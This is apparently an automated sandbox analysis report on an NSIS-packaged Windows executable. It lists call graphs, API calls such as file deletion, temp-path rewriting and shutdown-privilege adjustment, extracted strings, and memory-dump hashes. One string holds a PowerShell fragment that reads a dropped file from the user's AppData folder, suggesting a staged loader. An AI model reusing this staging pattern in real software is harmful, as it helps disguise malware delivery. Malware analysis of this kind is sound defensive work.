4423 401e37 4422->4423 4424 401e43 ShowWindow 4423->4424 4425 401e4e EnableWindow 4423->4425 4426 402951 4424->4426 4425->4426 4427 406725 4428 4065a9 4427->4428 4429 406f14 4428->4429 4430 406633 GlobalAlloc 4428->4430 4431 40662a GlobalFree 4428->4431 4432 4066a1 GlobalFree 4428->4432 4433 4066aa GlobalAlloc 4428->4433 4430->4428 4430->4429 4431->4430 4432->4433 4433->4428 4433->4429 4434 4064a6 WaitForSingleObject 4435 4064c0 4434->4435 4436 4064d2 GetExitCodeProcess 4435->4436 4437 40646d 2 API calls 4435->4437 4438 4064c7 WaitForSingleObject 4437->4438 4438->4435 4439 4038a7 4440 4038b2 4439->4440 4441 4038b6 4440->4441 4442 4038b9 GlobalAlloc 4440->4442 4442->4441 4443 401f2b 4444 402ac1 17 API calls 4443->4444 4445 401f32 4444->4445 4446 40639c 2 API calls 4445->4446 4447 401f38 4446->4447 4449 401f4a 4447->4449 4450 405ff7 wsprintfA 4447->4450 4450->4449 4451 40292c SendMessageA 4452 402951 4451->4452 4453 402946 InvalidateRect 4451->4453 4453->4452 4461 405134 4462 405144 4461->4462 4463 405158 4461->4463 4465 4051a1 4462->4465 4466 40514a 4462->4466 4464 405160 IsWindowVisible 4463->4464 4472 405177 4463->4472 4464->4465 4467 40516d 4464->4467 4468 4051a6 CallWindowProcA 4465->4468 4469 4041a6 SendMessageA 4466->4469 4474 404a8b SendMessageA 4467->4474 4470 405154 4468->4470 4469->4470 4472->4468 4479 404b0b 4472->4479 4475 404aea SendMessageA 4474->4475 4476 404aae GetMessagePos ScreenToClient SendMessageA 4474->4476 4477 404ae2 4475->4477 4476->4477 4478 404ae7 4476->4478 4477->4472 4478->4475 4488 406099 lstrcpynA 4479->4488 4481 404b1e 4489 405ff7 wsprintfA 4481->4489 4483 404b28 4484 40140b 2 API calls 4483->4484 4485 404b31 4484->4485 4490 406099 lstrcpynA 4485->4490 4487 404b38 4487->4465 4488->4481 4489->4483 4490->4487 4491 4026b4 4492 4026ba 4491->4492 4493 402951 4492->4493 4494 4026c2 FindClose 4492->4494 4494->4493 4495 402736 4496 402ac1 17 API calls 4495->4496 4497 402744 4496->4497 4498 40275a 4497->4498 4499 402ac1 17 API calls 4497->4499 4500 405c0d 2 API calls 4498->4500 4499->4498 4501 402760 4500->4501 4523 405c32 GetFileAttributesA CreateFileA 4501->4523 4503 40276d 4504 402816 4503->4504 4505 402779 GlobalAlloc 4503->4505 4506 402831 4504->4506 4507 40281e DeleteFileA 4504->4507 4508 402792 4505->4508 4509 40280d CloseHandle 4505->4509 4507->4506 4524 4032c5 SetFilePointer 4508->4524 4509->4504 4511 402798 4512 4032af ReadFile 4511->4512 4513 4027a1 GlobalAlloc 4512->4513 4514 4027b1 4513->4514 4515 4027eb 4513->4515 4516 40303e 44 API calls 4514->4516 4517 405cd9 WriteFile 4515->4517 4522 4027be 4516->4522 4518 4027f7 GlobalFree 4517->4518 4519 40303e 44 API calls 4518->4519 4521 40280a 4519->4521 4520 4027e2 GlobalFree 4520->4515 4521->4509 4522->4520 4523->4503 4524->4511 4525 4014b7 4526 4014bd 4525->4526 4527 401389 2 API calls 4526->4527 4528 4014c5 4527->4528 4529 401b39 4530 402ac1 17 API calls 4529->4530 4531 401b40 4530->4531 4532 402a9f 17 API calls 4531->4532 4533 401b49 wsprintfA 4532->4533 4534 402951 4533->4534 4535 40233a 4536 402ac1 17 API calls 4535->4536 4537 40234b 4536->4537 4538 402ac1 17 API calls 4537->4538 4539 402354 4538->4539 4540 402ac1 17 API calls 4539->4540 4541 40235e GetPrivateProfileStringA 4540->4541 3829 4015bb 3830 402ac1 17 API calls 3829->3830 3831 4015c2 3830->3831 3832 405aca 4 API calls 3831->3832 3842 4015ca 3832->3842 3833 401624 3835 401652 3833->3835 3836 401629 3833->3836 3834 405a5c CharNextA 3834->3842 3838 401423 24 API calls 3835->3838 3848 401423 3836->3848 3845 40164a 3838->3845 3840 405703 2 API calls 3840->3842 3842->3833 3842->3834 3842->3840 3843 405720 5 API calls 3842->3843 3846 40160c GetFileAttributesA 3842->3846 3847 405686 4 API calls 3842->3847 3843->3842 3844 40163b SetCurrentDirectoryA 3844->3845 3846->3842 3847->3842 3849 4051c0 24 API calls 3848->3849 3850 401431 3849->3850 3851 406099 lstrcpynA 3850->3851 3851->3844 4542 401d3b GetDlgItem GetClientRect 4543 402ac1 17 API calls 4542->4543 4544 401d6b LoadImageA SendMessageA 4543->4544 4545 402951 4544->4545 4546 401d89 DeleteObject 4544->4546 4546->4545 4547 4016bb 4548 402ac1 17 API calls 4547->4548 4549 4016c1 GetFullPathNameA 4548->4549 4550 4016f9 4549->4550 4551 4016d8 4549->4551 4552 402951 4550->4552 4553 40170d GetShortPathNameA 4550->4553 4551->4550 4554 40639c 2 API calls 4551->4554 4553->4552 4555 4016e9 4554->4555 4555->4550 4557 406099 lstrcpynA 4555->4557 4557->4550 4558 404b3d GetDlgItem GetDlgItem 4559 404b8f 7 API calls 4558->4559 4565 404da7 4558->4565 4560 404c32 DeleteObject 4559->4560 4561 404c25 SendMessageA 4559->4561 4562 404c3b 4560->4562 4561->4560 4563 404c72 4562->4563 4564 4060bb 17 API calls 4562->4564 4566 40415a 18 API calls 4563->4566 4569 404c54 SendMessageA SendMessageA 4564->4569 4568 404e8b 4565->4568 4576 404a8b 5 API calls 4565->4576 4588 404e18 4565->4588 4572 404c86 4566->4572 4567 404f37 4570 404f41 SendMessageA 4567->4570 4571 404f49 4567->4571 4568->4567 4573 404ee4 SendMessageA 4568->4573 4601 404d9a 4568->4601 4569->4562 4570->4571 4581 404f62 4571->4581 4582 404f5b ImageList_Destroy 4571->4582 4590 404f72 4571->4590 4577 40415a 18 API calls 4572->4577 4579 404ef9 SendMessageA 4573->4579 4573->4601 4574 4041c1 8 API calls 4580 40512d 4574->4580 4575 404e7d SendMessageA 4575->4568 4576->4588 4589 404c94 4577->4589 4578 4050e1 4586 4050f3 ShowWindow GetDlgItem ShowWindow 4578->4586 4578->4601 4584 404f0c 4579->4584 4585 404f6b GlobalFree 4581->4585 4581->4590 4582->4581 4583 404d68 GetWindowLongA SetWindowLongA 4587 404d81 4583->4587 4594 404f1d SendMessageA 4584->4594 4585->4590 4586->4601 4591 404d87 ShowWindow 4587->4591 4592 404d9f 4587->4592 4588->4568 4588->4575 4589->4583 4593 404ce3 SendMessageA 4589->4593 4595 404d62 4589->4595 4598 404d30 SendMessageA 4589->4598 4599 404d1f SendMessageA 4589->4599 4590->4578 4600 404b0b 4 API calls 4590->4600 4605 404fad 4590->4605 4609 40418f SendMessageA 4591->4609 4610 40418f SendMessageA 4592->4610 4593->4589 4594->4567 4595->4583 4595->4587 4598->4589 4599->4589 4600->4605 4601->4574 4602 4050b7 InvalidateRect 4602->4578 4603 4050cd 4602->4603 4606 404a46 20 API calls 4603->4606 4604 404fdb SendMessageA 4608 404ff1 4604->4608 4605->4604 4605->4608 4606->4578 4607 405065 SendMessageA SendMessageA 4607->4608 4608->4602 4608->4607 4609->4601 4610->4565

                                                  Executed Functions

                                                  Function 0040330D Relevance: 93.1, APIs: 33, Strings: 20, Instructions: 368stringcomfileCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 40330d-40334c SetErrorMode GetVersion 1 40334e-403356 call 406431 0->1 2 40335f 0->2 1->2 7 403358 1->7 4 403364-403377 call 4063c3 lstrlenA 2->4 9 403379-403395 call 406431 * 3 4->9 7->2 16 4033a6-403406 #17 OleInitialize SHGetFileInfoA call 406099 GetCommandLineA call 406099 GetModuleHandleA 9->16 17 403397-40339d 9->17 24 403412-403427 call 405a5c CharNextA 16->24 25 403408-40340d 16->25 17->16 21 40339f 17->21 21->16 28 4034ec-4034f0 24->28 25->24 29 4034f6 28->29 30 40342c-40342f 28->30 31 403509-403523 GetTempPathA call 4032dc 29->31 32 403431-403435 30->32 33 403437-40343f 30->33 42 403525-403543 GetWindowsDirectoryA lstrcatA call 4032dc 31->42 43 40357b-403595 DeleteFileA call 402d98 31->43 32->32 32->33 35 403441-403442 33->35 36 403447-40344a 33->36 35->36 37 403450-403454 36->37 38 4034dc-4034e9 call 405a5c 36->38 40 403456-40345c 37->40 41 40346c-403499 37->41 38->28 57 4034eb 38->57 45 403462 40->45 46 40345e-403460 40->46 47 40349b-4034a1 41->47 48 4034ac-4034da 41->48 42->43 59 403545-403575 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4032dc 42->59 60 403629-403639 call 4037f7 OleUninitialize 43->60 61 40359b-4035a1 43->61 45->41 46->41 46->45 52 4034a3-4034a5 47->52 53 4034a7 47->53 48->38 55 4034f8-403504 call 406099 48->55 52->48 52->53 53->48 55->31 57->28 59->43 59->60 72 40375d-403763 60->72 73 40363f-40364f call 4057b5 ExitProcess 60->73 64 4035a3-4035ae call 405a5c 61->64 65 403619-403620 call 4038e9 61->65 74 4035b0-4035d9 64->74 75 4035e4-4035ee 64->75 70 403625 65->70 70->60 77 403765-40377e GetCurrentProcess OpenProcessToken 72->77 78 4037df-4037e7 72->78 79 4035db-4035dd 74->79 82 4035f0-4035fd call 405b1f 75->82 83 403655-403669 call 405720 lstrcatA 75->83 85 4037b0-4037be call 406431 77->85 86 403780-4037aa LookupPrivilegeValueA AdjustTokenPrivileges 77->86 80 4037e9 78->80 81 4037ed-4037f1 ExitProcess 78->81 79->75 87 4035df-4035e2 79->87 80->81 82->60 94 4035ff-403615 call 406099 * 2 82->94 95 403676-403690 lstrcatA lstrcmpiA 83->95 96 40366b-403671 lstrcatA 83->96 97 4037c0-4037ca 85->97 98 4037cc-4037d6 ExitWindowsEx 85->98 86->85 87->75 87->79 94->65 95->60 101 403692-403695 95->101 96->95 97->98 99 4037d8-4037da call 40140b 97->99 98->78 98->99 99->78 105 403697-40369c call 405686 101->105 106 40369e call 405703 101->106 110 4036a3-4036b0 SetCurrentDirectoryA 105->110 106->110 113 4036b2-4036b8 call 406099 110->113 114 4036bd-4036e5 call 406099 110->114 113->114 118 4036eb-403707 call 4060bb DeleteFileA 114->118 121 403748-40374f 118->121 122 403709-403719 CopyFileA 118->122 121->118 123 403751-403758 call 405e78 121->123 122->121 124 40371b-403734 call 405e78 call 4060bb call 405738 122->124 123->60 132 403739-40373b 124->132 132->121 133 40373d-403744 CloseHandle 132->133 133->121
                                                  APIs
                                                  • SetErrorMode.KERNELBASE ref: 00403332
                                                  • GetVersion.KERNEL32 ref: 00403338
                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040336B
                                                  • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004033A7
                                                  • OleInitialize.OLE32(00000000), ref: 004033AE
                                                  • SHGetFileInfoA.SHELL32(0041FCF0,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 004033CA
                                                  • GetCommandLineA.KERNEL32(00423F20,NSIS Error,?,00000006,00000008,0000000A), ref: 004033DF
                                                  • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\Uundgaaelige.exe",00000000,?,00000006,00000008,0000000A), ref: 004033F2
                                                  • CharNextA.USER32(00000000,"C:\Users\user\Desktop\Uundgaaelige.exe",00000020,?,00000006,00000008,0000000A), ref: 0040341D
                                                  • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000006,00000008,0000000A), ref: 0040351A
                                                  • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 0040352B
                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403537
                                                  • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 0040354B
                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403553
                                                  • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403564
                                                  • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040356C
                                                  • DeleteFileA.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403580
                                                    • Part of subcall function 00406431: GetModuleHandleA.KERNEL32(?,?,?,00403380,0000000A), ref: 00406443
                                                    • Part of subcall function 00406431: GetProcAddress.KERNEL32(00000000,?), ref: 0040645E
                                                    • Part of subcall function 00406099: lstrcpynA.KERNEL32(?,?,00000400,004033DF,00423F20,NSIS Error,?,00000006,00000008,0000000A), ref: 004060A6
                                                    • Part of subcall function 004038E9: lstrlenA.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\raffineredes\cerous,1033,shaharit Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,shaharit Setup: Completed,00000000,00000002,77273410), ref: 004039D9
                                                    • Part of subcall function 004038E9: lstrcmpiA.KERNEL32(?,.exe), ref: 004039EC
                                                    • Part of subcall function 004038E9: GetFileAttributesA.KERNEL32(: Completed), ref: 004039F7
                                                    • Part of subcall function 004038E9: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\raffineredes\cerous), ref: 00403A40
                                                    • Part of subcall function 004038E9: RegisterClassA.USER32(00423EC0), ref: 00403A7D
                                                    • Part of subcall function 004037F7: CloseHandle.KERNEL32(000002AC,C:\Users\user\AppData\Local\Temp\,0040362E,?,?,00000006,00000008,0000000A), ref: 00403809
                                                    • Part of subcall function 004037F7: CloseHandle.KERNEL32(000002BC,C:\Users\user\AppData\Local\Temp\,0040362E,?,?,00000006,00000008,0000000A), ref: 0040381D
                                                  • OleUninitialize.OLE32(?,?,00000006,00000008,0000000A), ref: 0040362E
                                                  • ExitProcess.KERNEL32 ref: 0040364F
                                                  • GetCurrentProcess.KERNEL32(00000028,?,00000006,00000008,0000000A), ref: 0040376C
                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00403773
                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040378B
                                                  • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004037AA
                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 004037CE
                                                  • ExitProcess.KERNEL32 ref: 004037F1
                                                    • Part of subcall function 004057B5: MessageBoxIndirectA.USER32(0040A230), ref: 00405810
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: HandleProcess$ExitFile$CloseEnvironmentModulePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpilstrcpyn
                                                  • String ID: "$"$Acrasiales=Get-Content 'C:\Users\user\AppData\Roaming\raffineredes\cerous\Chugging\Dialektologi.Alt$"C:\Users\user\Desktop\Uundgaaelige.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\raffineredes\cerous$C:\Users\user\AppData\Roaming\raffineredes\cerous\Feltrkkeflgerne$C:\Users\user\Desktop$C:\Users\user\Desktop\Uundgaaelige.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                  • API String ID: 3704715180-3725486114
                                                  • Opcode ID: 6fb2701c2198554de983d489162d70f6248e26c12371a32bdff927a978f2d77a
                                                  • Instruction ID: 629f98fd345f67a1e75e2db33264847053f345a98c6a7e8b50a39e9081f0102f
                                                  • Opcode Fuzzy Hash: 6fb2701c2198554de983d489162d70f6248e26c12371a32bdff927a978f2d77a
                                                  • Instruction Fuzzy Hash: 46C1E6702047506AD721AF759D89A2F3EACAB81706F45443FF581B61E2CB7C8A158B2F
                                                  Function 004052FE Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282windowclipboardmemoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 134 4052fe-40531a 135 405320-4053e7 GetDlgItem * 3 call 40418f call 404a5e GetClientRect GetSystemMetrics SendMessageA * 2 134->135 136 4054a9-4054af 134->136 157 405405-405408 135->157 158 4053e9-405403 SendMessageA * 2 135->158 138 4054b1-4054d3 GetDlgItem CreateThread FindCloseChangeNotification 136->138 139 4054d9-4054e5 136->139 138->139 141 405507-40550d 139->141 142 4054e7-4054ed 139->142 146 405562-405565 141->146 147 40550f-405515 141->147 144 405528-40552f call 4041c1 142->144 145 4054ef-405502 ShowWindow * 2 call 40418f 142->145 154 405534-405538 144->154 145->141 146->144 149 405567-40556d 146->149 151 405517-405523 call 404133 147->151 152 40553b-40554b ShowWindow 147->152 149->144 159 40556f-405582 SendMessageA 149->159 151->144 155 40555b-40555d call 404133 152->155 156 40554d-405556 call 4051c0 152->156 155->146 156->155 163 405418-40542f call 40415a 157->163 164 40540a-405416 SendMessageA 157->164 158->157 165 405588-4055b4 CreatePopupMenu call 4060bb AppendMenuA 159->165 166 40567f-405681 159->166 173 405431-405445 ShowWindow 163->173 174 405465-405486 GetDlgItem SendMessageA 163->174 164->163 171 4055b6-4055c6 GetWindowRect 165->171 172 4055c9-4055df TrackPopupMenu 165->172 166->154 171->172 172->166 176 4055e5-4055ff 172->176 177 405454 173->177 178 405447-405452 ShowWindow 173->178 174->166 175 40548c-4054a4 SendMessageA * 2 174->175 175->166 180 405604-40561f SendMessageA 176->180 179 40545a-405460 call 40418f 177->179 178->179 179->174 180->180 181 405621-405641 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 180->181 183 405643-405663 SendMessageA 181->183 183->183 184 405665-405679 GlobalUnlock SetClipboardData CloseClipboard 183->184 184->166
                                                  APIs
                                                  • GetDlgItem.USER32(?,00000403), ref: 0040535D
                                                  • GetDlgItem.USER32(?,000003EE), ref: 0040536C
                                                  • GetClientRect.USER32(?,?), ref: 004053A9
                                                  • GetSystemMetrics.USER32(00000002), ref: 004053B0
                                                  • SendMessageA.USER32(?,0000101B,00000000,?), ref: 004053D1
                                                  • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004053E2
                                                  • SendMessageA.USER32(?,00001001,00000000,?), ref: 004053F5
                                                  • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405403
                                                  • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405416
                                                  • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405438
                                                  • ShowWindow.USER32(?,00000008), ref: 0040544C
                                                  • GetDlgItem.USER32(?,000003EC), ref: 0040546D
                                                  • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 0040547D
                                                  • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405496
                                                  • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004054A2
                                                  • GetDlgItem.USER32(?,000003F8), ref: 0040537B
                                                    • Part of subcall function 0040418F: SendMessageA.USER32(00000028,?,00000001,00403FBF), ref: 0040419D
                                                  • GetDlgItem.USER32(?,000003EC), ref: 004054BE
                                                  • CreateThread.KERNELBASE(00000000,00000000,Function_00005292,00000000), ref: 004054CC
                                                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004054D3
                                                  • ShowWindow.USER32(00000000), ref: 004054F6
                                                  • ShowWindow.USER32(?,00000008), ref: 004054FD
                                                  • ShowWindow.USER32(00000008), ref: 00405543
                                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405577
                                                  • CreatePopupMenu.USER32 ref: 00405588
                                                  • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 0040559D
                                                  • GetWindowRect.USER32(?,000000FF), ref: 004055BD
                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055D6
                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405612
                                                  • OpenClipboard.USER32(00000000), ref: 00405622
                                                  • EmptyClipboard.USER32 ref: 00405628
                                                  • GlobalAlloc.KERNEL32(00000042,?), ref: 00405631
                                                  • GlobalLock.KERNEL32(00000000), ref: 0040563B
                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040564F
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00405668
                                                  • SetClipboardData.USER32(00000001,00000000), ref: 00405673
                                                  • CloseClipboard.USER32 ref: 00405679
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                  • String ID: 0B
                                                  • API String ID: 4154960007-4132856435
                                                  • Opcode ID: 4ae86a2eb0e764239c625fe7474c6516e4a04bb5ce475004cf9a6bce91262fda
                                                  • Instruction ID: 65bb4f05285cabcaf0c1ceede2bf8135bd939e85a5c998f60940a67221f6d910
                                                  • Opcode Fuzzy Hash: 4ae86a2eb0e764239c625fe7474c6516e4a04bb5ce475004cf9a6bce91262fda
                                                  • Instruction Fuzzy Hash: A8A17A71900208BFDB119FA0DE89EAE7F79FB08355F00403AFA55BA1A0CB754E519F68
                                                  Function 00405861 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 159filestringCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 564 405861-405887 call 405b1f 567 4058a0-4058a7 564->567 568 405889-40589b DeleteFileA 564->568 570 4058a9-4058ab 567->570 571 4058ba-4058ca call 406099 567->571 569 405a2a-405a2e 568->569 572 4058b1-4058b4 570->572 573 4059d8-4059dd 570->573 579 4058d9-4058da call 405a78 571->579 580 4058cc-4058d7 lstrcatA 571->580 572->571 572->573 573->569 575 4059df-4059e2 573->575 577 4059e4-4059ea 575->577 578 4059ec-4059f4 call 40639c 575->578 577->569 578->569 588 4059f6-405a0a call 405a31 call 405819 578->588 582 4058df-4058e2 579->582 580->582 585 4058e4-4058eb 582->585 586 4058ed-4058f3 lstrcatA 582->586 585->586 587 4058f8-405916 lstrlenA FindFirstFileA 585->587 586->587 589 40591c-405933 call 405a5c 587->589 590 4059ce-4059d2 587->590 603 405a22-405a25 call 4051c0 588->603 604 405a0c-405a0f 588->604 597 405935-405939 589->597 598 40593e-405941 589->598 590->573 592 4059d4 590->592 592->573 597->598 600 40593b 597->600 601 405943-405948 598->601 602 405954-405962 call 406099 598->602 600->598 606 40594a-40594c 601->606 607 4059ad-4059bf FindNextFileA 601->607 614 405964-40596c 602->614 615 405979-405984 call 405819 602->615 603->569 604->577 609 405a11-405a20 call 4051c0 call 405e78 604->609 606->602 610 40594e-405952 606->610 607->589 612 4059c5-4059c8 FindClose 607->612 609->569 610->602 610->607 612->590 614->607 619 40596e-405977 call 405861 614->619 624 4059a5-4059a8 call 4051c0 615->624 625 405986-405989 615->625 619->607 624->607 626 40598b-40599b call 4051c0 call 405e78 625->626 627 40599d-4059a3 625->627 626->607 627->607
                                                  APIs
                                                  • DeleteFileA.KERNELBASE(?,?,77273410,77272EE0,00000000), ref: 0040588A
                                                  • lstrcatA.KERNEL32(00421D38,\*.*,00421D38,?,?,77273410,77272EE0,00000000), ref: 004058D2
                                                  • lstrcatA.KERNEL32(?,0040A014,?,00421D38,?,?,77273410,77272EE0,00000000), ref: 004058F3
                                                  • lstrlenA.KERNEL32(?,?,0040A014,?,00421D38,?,?,77273410,77272EE0,00000000), ref: 004058F9
                                                  • FindFirstFileA.KERNEL32(00421D38,?,?,?,0040A014,?,00421D38,?,?,77273410,77272EE0,00000000), ref: 0040590A
                                                  • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004059B7
                                                  • FindClose.KERNEL32(00000000), ref: 004059C8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                  • String ID: "C:\Users\user\Desktop\Uundgaaelige.exe"$\*.*
                                                  • API String ID: 2035342205-795289563
                                                  • Opcode ID: 83b5a4a5d0d8edda3f8e0557dfde68d1d2535845567fb2c63194c6eb2875a849
                                                  • Instruction ID: 1dcfc4082d76b88a8dbc056b088e655b37054d2965a561fc4bca86fefb361094
                                                  • Opcode Fuzzy Hash: 83b5a4a5d0d8edda3f8e0557dfde68d1d2535845567fb2c63194c6eb2875a849
                                                  • Instruction Fuzzy Hash: 8C51AF71900A04EADB22AB258C85BBF7A78DF42724F14817BF851B51D2D73C4982DF6E
                                                  Function 00406725 Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
